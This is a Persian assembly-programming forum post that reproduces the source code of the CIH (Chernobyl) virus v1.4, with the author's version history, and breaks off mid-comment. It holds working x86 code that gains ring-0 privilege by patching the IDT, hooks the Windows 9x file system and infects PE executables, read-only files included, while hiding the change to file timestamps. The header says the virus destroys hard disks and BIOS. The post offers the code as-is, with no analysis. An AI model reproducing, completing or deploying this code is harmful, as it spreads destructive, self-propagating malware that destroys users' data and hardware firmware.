# برنامه نویسی سطح پایین > برنامه نویسی اسمبلی خانواده x86 >  CIH قوی ترین ویروس مشاهده شده.

## Best Programmer

; **************************************************  **************************
; *			The Virus Program Information                        *
; **************************************************  **************************
; *                                                                          *
; *	Designer &#58; CIH			Source &#58; TTIT of TATUNG in Taiwan    *
; *	Create Date &#58; 04/26/1998	Now Version &#58; 1.4                    *
; *     Modification Time &#58; 05/31/1998                                       *
; *									     *
; *	Turbo Assembler Version 4.0	&#58; tasm /m cih			     *
; *	Turbo Link Version 3.01		&#58; tlink /3 /t cih, cih.exe	     *
; *									     *
; *=================================================  =========================*
; *			Modification History                                 *
; *=================================================  =========================*
; *	v1.0	1. Create the Virus Program.                                 *
; *		2. The Virus Modifies IDT to Get Ring0 Privilege.            *
; * 04/26/1998  3. Virus Code doesn't Reload into System.                    *
; *		4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; *		5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook.  *
; *		6. When System Opens Existing PE File, the File will be      *
; *                Infected, and the File doesn't be Reinfected.             *
; *		7. It is also Infected, even the File is Read-Only.          *
; *		8. When the File is Infected, the Modification Date and Time *
; *		   of the File also don't be Changed.                        *
; *		9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call  *
; *		   Previous FileSystemApiHook, it will Call the Function     *
; *		   that the IFS Manager Would Normally Call to Implement     *
; *		   this Particular I/O Request.                              *
; *	       10. The Virus Size is only 656 Bytes.                         *
; *=================================================  =========================*
; *	v1.1	1. Especially, the File that be Infected will not Increase   *
; *		   it's Size...   ^__^					     *
; * 05/15/1998	2. Hook and Modify Structured Exception Handing.	     *
; *		   When Exception Error Occurs, Our OS System should be in   *
; *		   Windows NT. So My Cute Virus will not Continue to Run,    *
; *		   it will Jmup to Original Application to Run.		     *
; *		3. Use Better Algorithm, Reduce Virus Code Size.	     *
; *		4. The Virus "Basic" Size is only 796 Bytes.		     *
; *=================================================  =========================*
; *	v1.2	1. Kill All HardDisk, and BIOS... Super... Killer...	     *
; *		2. Modify the Bug of v1.1				     *
; * 05/21/1998	3. The Virus "Basic" Size is 1003 Bytes.		     *
; *=================================================  =========================*
; *	v1.3	1. Modify the Bug that WinZip Self-Extractor Occurs Error.   *
; *		   So When Open WinZip Self-Extractor ==> Don't Infect it.   *
; * 05/24/1998	2. The Virus "Basic" Size is 1010 Bytes.		     *
; *=================================================  =========================*
; *	v1.4	1. Full Modify the Bug &#58; WinZip Self-Extractor Occurs Error. *
; *		2. Change the Date of Killing Computers.		     *
; * 05/31/1998	3. Modify Virus Version Copyright.			     *
; *		4. The Virus "Basic" Size is 1019 Bytes.		     *
; **************************************************  **************************

                .586P

; **************************************************  **************************
; *             Original PE Executable File&#40;Don't Modify this Section&#41;       *
; **************************************************  **************************

OriginalAppEXE  SEGMENT

FileHeader&#58;
                db      04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
                db      004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
                db      0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
                db      00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
                db      021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
                db      069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
                db      061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
                db      074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
                db      020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
                db      06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
                db      024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
                db      0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
                db      00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
                db      000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
                db      000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
                db      004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
                db      000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
                db      000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
                db      000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
                db      000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
                db      000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
                db      000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
		dd	00000000h, VirusSize

OriginalAppEXE  ENDS

; **************************************************  **************************
; *                     My Virus Game                                        *
; **************************************************  **************************

; **************************************************  *******
; *                    Constant Define                    *
; **************************************************  *******

TRUE			=	1
FALSE			=	0

DEBUG			=	TRUE

MajorVirusVersion	=	1
MinorVirusVersion	=	4

VirusVersion		=	MajorVirusVersion*10h+MinorVirusVersion


IF	DEBUG

	FirstKillHardDiskNumber	=	81h
	HookExceptionNumber     =       05h

ELSE

	FirstKillHardDiskNumber	=	80h
	HookExceptionNumber     =       03h

ENDIF


FileNameBufferSize	=	7fh

; **************************************************  *******
; **************************************************  *******

VirusGame               SEGMENT

                        ASSUME  CS&#58;VirusGame, DS&#58;VirusGame, SS&#58;VirusGame
                        ASSUME  ES&#58;VirusGame, FS&#58;VirusGame, GS&#58;VirusGame

; **************************************************  *******
; *             Ring3 Virus Game Initial Program          *
; **************************************************  *******

MyVirusStart&#58;
			push	ebp

; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error  *
; * Occurrence, Especially in NT.     *
; *************************************

			lea	eax, &#91;esp-04h*2&#93;

			xor	ebx, ebx
			xchg	eax, fs&#58;&#91;ebx&#93;

			call	@0
@0&#58;
			pop	ebx

			lea	ecx, StopToRunVirusCode-@0&#91;ebx&#93;
			push	ecx

			push	eax

; *************************************
; * Let's Modify                      *
; * IDT&#40;Interrupt Descriptor Table&#41;   *
; * to Get Ring0 Privilege...         *
; *************************************

			push	eax		;
                        sidt    &#91;esp-02h&#93;       ; Get IDT Base Address
                        pop     ebx             ;

                        add     ebx, HookExceptionNumber*08h+04h ; ZF = 0

			cli

                        mov     ebp, &#91;ebx&#93;      ; Get Exception Base
                        mov     bp, &#91;ebx-04h&#93;   ; Entry Point

                        lea     esi, MyExceptionHook-@1&#91;ecx&#93;

			push	esi

			mov	&#91;ebx-04h&#93;, si		;
			shr	esi, 16			; Modify Exception
			mov	&#91;ebx+02h&#93;, si		; Entry Point Address

			pop	esi

; *************************************
; * Generate Exception to Get Ring0   *
; *************************************

			int	HookExceptionNumber	; GenerateException
ReturnAddressOfEndException	=	$

; *************************************
; * Merge All Virus Code Section      *
; *************************************

			push	esi
			mov	esi, eax

LoopOfMergeAllVirusCodeSection&#58;

			mov	ecx, &#91;eax-04h&#93;

			rep	movsb

			sub	eax, 08h

			mov	esi, &#91;eax&#93;

			or	esi, esi
			jz	QuitLoopOfMergeAllVirusCodeSection ; ZF = 1

			jmp	LoopOfMergeAllVirusCodeSection

QuitLoopOfMergeAllVirusCodeSection&#58;

			pop	esi

; *************************************
; * Generate Exception Again          *
; *************************************

			int	HookExceptionNumber	; GenerateException Again

; *************************************
; * Let's Restore                     *
; * Structured Exception Handing      *
; *************************************

ReadyRestoreSE&#58;
			sti

			xor	ebx, ebx

			jmp	RestoreSE

; *************************************
; * When Exception Error Occurs,      *
; * Our OS System should be in NT.    *
; * So My Cute Virus will not         *
; * Continue to Run, it Jmups to      *
; * Original Application to Run.      *
; *************************************

StopToRunVirusCode&#58;
@1			=	StopToRunVirusCode

			xor	ebx, ebx
			mov	eax, fs&#58;&#91;ebx&#93;
			mov	esp, &#91;eax&#93;

RestoreSE&#58;
			pop	dword ptr fs&#58;&#91;ebx&#93;
			pop	eax

; *************************************
; * Return Original App to Execute    *
; *************************************

			pop	ebp

                        push    00401000h       ; Push Original
OriginalAddressOfEntryPoint	=	$-4	; App Entry Point to Stack

                        ret     ; Return to Original App Entry Point

; **************************************************  *******
; *             Ring0 Virus Game Initial Program          *
; **************************************************  *******

MyExceptionHook&#58;
@2			=	MyExceptionHook

			jz	InstallMyFileSystemApiHook

; *************************************
; * Do My Virus Exist in System !?    *
; *************************************

			mov	ecx, dr0
			jecxz	AllocateSystemMemoryPage

			add	dword ptr &#91;esp&#93;, ReadyRestoreSE-ReturnAddressOfEndException

; *************************************
; * Return to Ring3 Initial Program   *
; *************************************

ExitRing0Init&#58;
			mov	&#91;ebx-04h&#93;, bp	;
			shr	ebp, 16		; Restore Exception
			mov	&#91;ebx+02h&#93;, bp	;

			iretd

; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************

AllocateSystemMemoryPage&#58;

			mov	dr0, ebx	; Set the Mark of My Virus Exist in System

			push	00000000fh	;
			push	ecx		;
			push	0ffffffffh	;
			push	ecx		;
			push	ecx		;
			push	ecx		;
			push	000000001h	;
			push	000000002h	;
			int	20h		; VMMCALL _PageAllocate
_PageAllocate		=	$		;
			dd	00010053h	; Use EAX, ECX, EDX, and flags
			add	esp, 08h*04h

			xchg	edi, eax	; EDI = SystemMemory Start Address

			lea	eax, MyVirusStart-@2&#91;esi&#93;

			iretd	; Return to Ring3 Initial Program

; *************************************
; * Install My File System Api Hook   *
; *************************************

InstallMyFileSystemApiHook&#58;

			lea	eax, FileSystemApiHook-@6&#91;edi&#93;

			push	eax  ;
			int	20h  ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook	=	$	;
			dd      00400067h	; Use EAX, ECX, EDX, and flags

			mov	dr0, eax	; Save OldFileSystemApiHook Address

			pop	eax	; EAX = FileSystemApiHook Address

			; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
			mov	ecx, IFSMgr_InstallFileSystemApiHook-@2&#91;esi&#93;
			mov	edx, &#91;ecx&#93;
			mov	OldInstallFileSystemApiHook-@3&#91;eax&#93;, edx

			; Modify IFSMgr_InstallFileSystemApiHook Entry Point
			lea	eax, InstallFileSystemApiHook-@3&#91;eax&#93;
			mov	&#91;ecx&#93;, eax

			cli

			jmp	ExitRing0Init

; **************************************************  *******
; *             Code Size of Merge Virus Code Section     *
; **************************************************  *******

CodeSizeOfMergeVirusCodeSection		=	offset $

; **************************************************  *******
; *             IFSMgr_InstallFileSystemApiHook           *
; **************************************************  *******

InstallFileSystemApiHook&#58;
			push	ebx

			call	@4	;
@4&#58;					;
			pop	ebx	; mov ebx, offset FileSystemApiHook
			add	ebx, FileSystemApiHook-@4	;

			push	ebx
			int	20h  ; VXDCALL IFSMgr_RemoveFileSystemApiHook
IFSMgr_RemoveFileSystemApiHook	=	$
			dd      00400068h	; Use EAX, ECX, EDX, and flags
			pop	eax

			; Call Original IFSMgr_InstallFileSystemApiHook
			; to Link Client FileSystemApiHook
			push	dword ptr &#91;esp+8&#93;
			call	OldInstallFileSystemApiHook-@3&#91;ebx&#93;
			pop	ecx

			push	eax

			; Call Original IFSMgr_InstallFileSystemApiHook
			; to Link My FileSystemApiHook
			push	ebx
			call	OldInstallFileSystemApiHook-@3&#91;ebx&#93;
			pop	ecx

			mov	dr0, eax	; Adjust OldFileSystemApiHook Address

			pop	eax

			pop	ebx

			ret

; **************************************************  *******
; *			Static Data                       *
; **************************************************  *******

OldInstallFileSystemApiHook	dd	?

; **************************************************  *******
; *             IFSMgr_FileSystemHook                     *
; **************************************************  *******

; *************************************
; * IFSMgr_FileSystemHook Entry Point *
; *************************************

FileSystemApiHook&#58;
@3			=	FileSystemApiHook

			pushad

                        call    @5	;
@5&#58;					;
                        pop     esi	; mov esi, offset VirusGameDataStartAddress
                        add     esi, VirusGameDataStartAddress-@5

; *************************************
; * Is OnBusy !?                      *
; *************************************

			test	byte ptr &#40;OnBusy-@6&#41;&#91;esi&#93;, 01h	; if &#40; OnBusy &#41;
			jnz	pIFSFunc			; goto pIFSFunc

; *************************************
; * Is OpenFile !?                    *
; *************************************

			; if &#40; NotOpenFile &#41;
			; goto prevhook
			lea	ebx, &#91;esp+20h+04h+04h&#93;
			cmp	dword ptr &#91;ebx&#93;, 00000024h
			jne	prevhook

; *************************************
; * Enable OnBusy                     *
; *************************************

			inc	byte ptr &#40;OnBusy-@6&#41;&#91;esi&#93;	; Enable OnBusy

; *************************************
; * Get FilePath's DriveNumber,       *
; * then Set the DriveName to         *
; * FileNameBuffer.                   *
; *************************************
; * Ex. If DriveNumber is 03h,        *
; *     DriveName is 'C&#58;'.            *
; *************************************

			; mov esi, offset FileNameBuffer
			add	esi, FileNameBuffer-@6

			push	esi

			mov	al, &#91;ebx+04h&#93;
			cmp	al, 0ffh
			je	CallUniToBCSPath

			add	al, 40h
			mov	ah, '&#58;'

			mov	&#91;esi&#93;, eax

			inc	esi
			inc	esi

; *************************************
; * UniToBCSPath                      *
; *************************************
; * This Service Converts             *
; * a Canonicalized Unicode Pathname  *
; * to a Normal Pathname in the       *
; * Specified BCS Character Set.      *
; *************************************

CallUniToBCSPath&#58;
			push	00000000h
			push	FileNameBufferSize
			mov	ebx, &#91;ebx+10h&#93;
			mov	eax, &#91;ebx+0ch&#93;
			add	eax, 04h
			push	eax
			push	esi
			int	20h	; VXDCall UniToBCSPath
UniToBCSPath		=	$
			dd	00400041h
			add	esp, 04h*04h

; *************************************
; * Is FileName '.EXE' !?             *
; *************************************

			; cmp &#91;esi+eax-04h&#93;, '.EXE'
			cmp	&#91;esi+eax-04h&#93;, 'EXE.'
			pop	esi
			jne	DisableOnBusy

IF	DEBUG

; *************************************
; * Only for Debug                    *
; *************************************

			; cmp &#91;esi+eax-06h&#93;, '****'
			cmp	&#91;esi+eax-06h&#93;, 'KCUF'
			jne	DisableOnBusy

ENDIF

; *************************************
; * Is Open Existing File !?          *
; *************************************

			; if &#40; NotOpenExistingFile &#41;
			; goto DisableOnBusy
			cmp	word ptr &#91;ebx+18h&#93;, 01h
			jne	DisableOnBusy

; *************************************
; * Get Attributes of the File        *
; *************************************

			mov	ax, 4300h
			int	20h	; VXDCall IFSMgr_Ring0_FileIO
IFSMgr_Ring0_FileIO	=	$
			dd	00400032h

			jc	DisableOnBusy

			push	ecx

; *************************************
; * Get IFSMgr_Ring0_FileIO Address   *
; *************************************

			mov	edi, dword ptr &#40;IFSMgr_Ring0_FileIO-@7&#41;&#91;esi&#93;
			mov	edi, &#91;edi&#93;

; *************************************
; * Is Read-Only File !?              *
; *************************************

			test	cl, 01h
			jz	OpenFile

; *************************************
; * Modify Read-Only File to Write    *
; *************************************

			mov	ax, 4301h
			xor	ecx, ecx
			call	edi	; VXDCall IFSMgr_Ring0_FileIO

; *************************************
; * Open File                         *
; *************************************

OpenFile&#58;
			xor	eax, eax
			mov	ah, 0d5h
			xor	ecx, ecx
			xor	edx, edx
			inc	edx
			mov	ebx, edx
			inc	ebx
			call	edi	; VXDCall IFSMgr_Ring0_FileIO

			xchg	ebx, eax	; mov ebx, FileHandle

; *************************************
; * Need to Restore                   *
; * Attributes of the File !?         *
; *************************************

			pop	ecx

			pushf

			test	cl, 01h
			jz	IsOpenFileOK

; *************************************
; * Restore Attributes of the File    *
; *************************************

			mov	ax, 4301h
			call	edi	; VXDCall IFSMgr_Ring0_FileIO

; *************************************
; * Is Open File OK !?                *
; *************************************

IsOpenFileOK&#58;
			popf

			jc	DisableOnBusy

; *************************************
; * Open File Already Succeed.   ^__^ *
; *************************************

			push	esi	; Push FileNameBuffer Address to Stack

			pushf		; Now CF = 0, Push Flag to Stack

			add	esi, DataBuffer-@7 ; mov esi, offset DataBuffer

; ***************************
; * Get OffsetToNewHeader   *
; ***************************

			xor	eax, eax
			mov	ah, 0d6h

			; For Doing Minimal VirusCode's Length,
			; I Save EAX to EBP.
			mov	ebp, eax

			push	00000004h
			pop	ecx
			push	0000003ch
			pop	edx
			call	edi	; VXDCall IFSMgr_Ring0_FileIO

			mov	edx, &#91;esi&#93;

; ***************************
; * Get 'PE\0' Signature    *
; * of ImageFileHeader, and *
; * Infected Mark.          *
; ***************************

			dec	edx

			mov	eax, ebp
			call	edi	; VXDCall IFSMgr_Ring0_FileIO

; ***************************
; * Is PE !?                *
; ***************************
; * Is the File             *
; * Already Infected !?     *
; ***************************
; * WinZip Self-Extractor   *
; * doesn't Have Infected   *
; * Mark Because My Virus   *
; * doesn't Infect it.      *
; ***************************

			; cmp &#91;esi&#93;, '\0PE\0'
			cmp	dword ptr &#91;esi&#93;, 00455000h
			jne	CloseFile

; *************************************
; * The File is                   ^o^ *
; * PE&#40;Portable Executable&#41; indeed.   *
; *************************************
; * The File isn't also Infected.     *
; *************************************

; *************************************
; * Start to Infect the File          *
; *************************************
; * Registers Use Status Now &#58;        *
; *                                   *
; * EAX = 04h                         *
; * EBX = File Handle                 *
; * ECX = 04h                         *
; * EDX = 'PE\0\0' Signature of       *
; *       ImageFileHeader Pointer's   *
; *	  Former Byte.                *
; * ESI = DataBuffer Address ==> @8   *
; * EDI = IFSMgr_Ring0_FileIO Address *
; * EBP = D600h ==> Read Data in File *
; *************************************
; * Stack Dump &#58;                      *
; *                                   *
; * ESP => -------------------------  *
; *        |       EFLAG&#40;CF=0&#41;     |  *
; *        -------------------------  *
; *        | FileNameBufferPointer |  *
; *        -------------------------  *
; *        |          EDI          |  *
; *        -------------------------  *
; *        |          ESI          |  *
; *        -------------------------  *
; *        |          EBP          |  *
; *        -------------------------  *
; *        |          ESP          |  *
; *        -------------------------  *
; *        |          EBX          |  *
; *        -------------------------  *
; *        |          EDX          |  *
; *        -------------------------  *
; *        |          ECX          |  *
; *        -------------------------  *
; *        |          EAX          |  *
; *        -------------------------  *
; *        |     Return Address    |  *
; *        -------------------------  *
; *************************************

			push	ebx	; Save File Handle

			push	00h	; Set VirusCodeSectionTableEndMark

; ***************************
; * Let's Set the           *
; * Virus' Infected Mark    *
; ***************************

			push	01h	; Size
			push	edx	; Pointer of File
			push	edi	; Address of Buffer

; ***************************
; * Save ESP Register       *
; ***************************

			mov	dr1, esp

; ***************************
; * Let's Set the           *
; * NewAddressOfEntryPoint  *
; * &#40; Only First Set Size &#41; *
; ***************************

			push	eax	; Size

; ***************************
; * Let's Read              *
; * Image Header in File    *
; ***************************

			mov	eax, ebp
			mov	cl, SizeOfImageHeaderToRead
			add	edx, 07h ; Move EDX to NumberOfSections
			call	edi	 ; VXDCall IFSMgr_Ring0_FileIO

; ***************************
; * Let's Set the           *
; * NewAddressOfEntryPoint  *
; * &#40; Set Pointer of File,  *
; *   Address of Buffer   &#41; *
; ***************************

			lea	eax, &#40;AddressOfEntryPoint-@8&#41;&#91;edx&#93;
			push	eax	; Pointer of File

			lea	eax, &#40;NewAddressOfEntryPoint-@8&#41;&#91;esi&#93;
			push	eax	; Address of Buffer

; ***************************
; * Move EDX to the Start   *
; * of SectionTable in File *
; ***************************

			movzx	eax, word ptr &#40;SizeOfOptionalHeader-@8&#41;&#91;esi&#93;
			lea	edx, &#91;eax+edx+12h&#93;

; ***************************
; * Let's Get               *
; * Total Size of Sections  *
; ***************************

			mov	al, SizeOfScetionTable

			; I Assume NumberOfSections &lt;= 0ffh
			mov	cl, &#40;NumberOfSections-@8&#41;&#91;esi&#93;

			mul	cl

; ***************************
; * Let's Set Section Table *
; ***************************

			; Move ESI to the Start of SectionTable
			lea	esi, &#40;StartOfSectionTable-@8&#41;&#91;esi&#93;

			push	eax	; Size
			push	edx	; Pointer of File
			push	esi	; Address of Buffer

; ***************************
; * The Code Size of Merge  *
; * Virus Code Section and  *
; * Total Size of Virus     *
; * Code Section Table Must *
; * be Small or Equal the   *
; * Unused Space Size of    *
; * Following Section Table *
; ***************************

			inc	ecx
			push	ecx	; Save NumberOfSections+1

			shl	ecx, 03h
			push	ecx	; Save TotalSizeOfVirusCodeSectionTable

			add	ecx, eax
			add	ecx, edx

			sub	ecx, &#40;SizeOfHeaders-@9&#41;&#91;esi&#93;
			not	ecx
			inc	ecx

			; Save My Virus First Section Code
			; Size of Following Section Table...
			; &#40; Not Include the Size of Virus Code Section Table &#41;
			push	ecx

			xchg	ecx, eax	; ECX = Size of Section Table

			; Save Original Address of Entry Point
			mov	eax, &#40;AddressOfEntryPoint-@9&#41;&#91;esi&#93;
			add	eax, &#40;ImageBase-@9&#41;&#91;esi&#93;
			mov	&#40;OriginalAddressOfEntryPoint-@9&#41;&#91;esi&#93;, eax

			cmp	word ptr &#91;esp&#93;, small CodeSizeOfMergeVirusCodeSection
			jl	OnlySetInfectedMark

; ***************************
; * Read All Section Tables *
; ***************************

			mov	eax, ebp
			call	edi	; VXDCall IFSMgr_Ring0_FileIO

; ***************************
; * Full Modify the Bug &#58;   *
; * WinZip Self-Extractor   *
; * Occurs Error...         *
; ***************************
; * So When User Opens      *
; * WinZip Self-Extractor,  *
; * Virus Doesn't Infect it.*
; ***************************
; * First, Virus Gets the   *
; * PointerToRawData in the *
; * Second Section Table,   *
; * Reads the Section Data, *
; * and Tests the String of *
; * 'WinZip&#40;R&#41;'......       *
; ***************************

			xchg	eax, ebp

			push	00000004h
			pop	ecx

			push	edx
			mov	edx, &#40;SizeOfScetionTable+PointerToRawData-@9&#41;&#91;esi&#93;
			add	edx, 12h

			call	edi	; VXDCall IFSMgr_Ring0_FileIO

			; cmp &#91;esi&#93;, 'nZip'
			cmp	dword ptr &#91;esi&#93;, 'piZn'
			je	NotSetInfectedMark

			pop	edx

; ***************************
; * Let's Set Total Virus   *
; * Code Section Table      *
; ***************************

			; EBX = My Virus First Section Code
			;	Size of Following Section Table
			pop	ebx
			pop	edi	; EDI = TotalSizeOfVirusCodeSectionTable
			pop	ecx	; ECX = NumberOfSections+1

			push	edi		; Size

			add	edx, ebp
			push	edx		; Pointer of File

			add	ebp, esi
			push	ebp		; Address of Buffer

; ***************************
; * Set the First Virus     *
; * Code Section Size in    *
; * VirusCodeSectionTable   *
; ***************************

			lea	eax, &#91;ebp+edi-04h&#93;
			mov	&#91;eax&#93;, ebx

; ***************************
; * Let's Set My Virus      *
; * First Section Code      *
; ***************************

			push	ebx	; Size

			add	edx, edi
			push	edx	; Pointer of File

			lea	edi, &#40;MyVirusStart-@9&#41;&#91;esi&#93;
			push	edi	; Address of Buffer

; ***************************
; * Let's Modify the        *
; * AddressOfEntryPoint to  *
; * My Virus Entry Point    *
; ***************************

			mov	&#40;NewAddressOfEntryPoint-@9&#41;&#91;esi&#93;, edx

; ***************************
; * Setup Initial Data      *
; ***************************

			lea	edx, &#91;esi-SizeOfScetionTable&#93;
			mov	ebp, offset VirusSize

			jmp	StartToWriteCodeToSections

; ***************************
; * Write Code to Sections  *
; ***************************

LoopOfWriteCodeToSections&#58;

			add	edx, SizeOfScetionTable

			mov	ebx, &#40;SizeOfRawData-@9&#41;&#91;edx&#93;
			sub	ebx, &#40;VirtualSize-@9&#41;&#91;edx&#93;
			jbe	EndOfWriteCodeToSections

			push	ebx	; Size

			sub	eax, 08h
			mov	&#91;eax&#93;, ebx

			mov	ebx, &#40;PointerToRawData-@9&#41;&#91;edx&#93;
			add	ebx, &#40;VirtualSize-@9&#41;&#91;edx&#93;
			push	ebx	; Pointer of File

			push	edi	; Address of Buffer

			mov	ebx, &#40;VirtualSize-@9&#41;&#91;edx&#93;
			add	ebx, &#40;VirtualAddress-@9&#41;&#91;edx&#93;
			add	ebx, &#40;ImageBase-@9&#41;&#91;esi&#93;
			mov	&#91;eax+4&#93;, ebx

			mov	ebx, &#91;eax&#93;
			add	&#40;VirtualSize-@9&#41;&#91;edx&#93;, ebx

			; Section contains initialized data ==> 00000040h
			; Section can be Read.              ==> 40000000h
			or	&#40;Characteristics-@9&#41;&#91;edx&#93;, 40000040h

StartToWriteCodeToSections&#58;

			sub	ebp, ebx
			jbe	SetVirusCodeSectionTableEndMark

			add	edi, ebx	; Move Address of Buffer

EndOfWriteCodeToSections&#58;

			loop	LoopOfWriteCodeToSections

; ***************************
; * Only Set Infected Mark  *
; ***************************

OnlySetInfectedMark&#58;
			mov	esp, dr1

			jmp	WriteVirusCodeToFile

; ***************************
; * Not Set Infected Mark   *
; ***************************

NotSetInfectedMark&#58;
			add	esp, 3ch

			jmp	CloseFile

; ***************************
; * Set Virus Code          *
; * Section Table End Mark  *
; ***************************

SetVirusCodeSectionTableEndMark&#58;

			; Adjust Size of Virus Section Code to Correct Value
			add	&#91;eax&#93;, ebp
			add	&#91;esp+08h&#93;, ebp

			; Set End Mark
			xor	ebx, ebx
			mov	&#91;eax-04h&#93;, ebx

; ***************************
; * When VirusGame Calls    *
; * VxDCall, VMM Modifies   *
; * the 'int 20h' and the   *
; * 'Service Identifier'    *
; * to 'Call &#91;XXXXXXXX&#93;'.   *
; ***************************
; * Before Writing My Virus *
; * to File, I Must Restore *
; * them First.     ^__^    *
; ***************************

			lea	eax, &#40;LastVxDCallAddress-2-@9&#41;&#91;esi&#93;

			mov	cl, VxDCallTableSize

LoopOfRestoreVxDCallID&#58;
			mov	word ptr &#91;eax&#93;, 20cdh

			mov	edx, &#40;VxDCallIDTable+&#40;ecx-1&#41;*04h-@9&#41;&#91;esi&#93;
			mov	&#91;eax+2&#93;, edx

			movzx	edx, byte ptr &#40;VxDCallAddressTable+ecx-1-@9&#41;&#91;esi&#93;
			sub	eax, edx

			loop	LoopOfRestoreVxDCallID

; ***************************
; * Let's Write             *
; * Virus Code to the File  *
; ***************************

WriteVirusCodeToFile&#58;
			mov	eax, dr1
			mov	ebx, &#91;eax+10h&#93;
			mov	edi, &#91;eax&#93;

LoopOfWriteVirusCodeToFile&#58;

			pop	ecx
			jecxz	SetFileModificationMark

			mov	esi, ecx
			mov	eax, 0d601h
			pop	edx
			pop	ecx

			call	edi	; VXDCall IFSMgr_Ring0_FileIO

			jmp	LoopOfWriteVirusCodeToFile

; ***************************
; * Let's Set CF = 1 ==>    *
; * Need to Restore File    *
; * Modification Time       *
; ***************************

SetFileModificationMark&#58;
			pop	ebx
			pop	eax

			stc		; Enable CF&#40;Carry Flag&#41;
			pushf

; *************************************
; * Close File                        *
; *************************************

CloseFile&#58;
			xor	eax, eax
			mov	ah, 0d7h
			call	edi	; VXDCall IFSMgr_Ring0_FileIO

; *************************************
; * Need to Restore File Modification *
; * Time !?                           *
; *************************************

			popf
			pop	esi
			jnc	IsKillComputer

; *************************************
; * Restore File Modification Time    *
; *************************************

			mov	ebx, edi

			mov	ax, 4303h
			mov	ecx, &#40;FileModificationTime-@7&#41;&#91;esi&#93;
			mov	edi, &#40;FileModificationTime+2-@7&#41;&#91;esi&#93;
			call	ebx	; VXDCall IFSMgr_Ring0_FileIO

; *************************************
; * Disable OnBusy                    *
; *************************************

DisableOnBusy&#58;
			dec	byte ptr &#40;OnBusy-@7&#41;&#91;esi&#93;	; Disable OnBusy

; *************************************
; * Call Previous FileSystemApiHook   *
; *************************************

prevhook&#58;
			popad

			mov	eax, dr0	;
			jmp	&#91;eax&#93;		; Jump to prevhook

; *************************************
; * Call the Function that the IFS    *
; * Manager Would Normally Call to    *
; * Implement this Particular I/O     *
